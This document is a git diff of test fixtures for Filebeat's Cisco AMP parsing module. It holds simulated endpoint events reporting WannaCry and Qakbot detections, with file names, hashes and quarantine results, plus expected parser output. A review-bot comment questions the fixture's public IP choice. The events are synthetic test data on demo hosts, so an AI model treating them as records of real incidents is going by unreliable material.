+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
\ 
No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json
index 6fb9fdebb741..58adf113ba63 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp5.ndjson.log-expected.json
@@ -3,7 +3,7 @@
 "@timestamp": "2021-01-14T17:39:50.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -58,7 +58,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -74,7 +74,7 @@
 "@timestamp": "2021-01-14T17:39:49.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -108,7 +108,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 1522,
+ "log.offset": 1527,
 "related.hash": [
 "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
 ],
@@ -117,7 +117,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -129,7 +129,7 @@
 "@timestamp": "2021-01-14T17:39:49.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
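Review bot: The replacement address 175.16.199.1 in the `+ "cisco.amp.computer.external_ip"` line is a publicly routable address, not one of the RFC 5737 documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) that fixtures normally use to avoid pointing at a real host; the same substitution recurs in every `external_ip`/`related.ip` hunk of this expected file and in the ndjson fixture above it. If the value was chosen because the test GeoIP database has an entry for it, a one-line comment in the module's test README or the fixture's sibling docs stating that would keep the next maintainer from "fixing" it back to a reserved range. The `log.offset` increments in the neighbouring hunks (+5 bytes per preceding record) are consistent with the 7→12 character change, so the expected output itself looks coherent.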
@@ -163,7 +163,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 2708,
+ "log.offset": 2718,
 "related.hash": [
 "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
 ],
@@ -172,7 +172,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -184,7 +184,7 @@
 "@timestamp": "2021-01-14T17:39:49.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -222,7 +222,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 3893,
+ "log.offset": 3908,
 "related.hash": [
 "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
 ],
@@ -231,7 +231,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
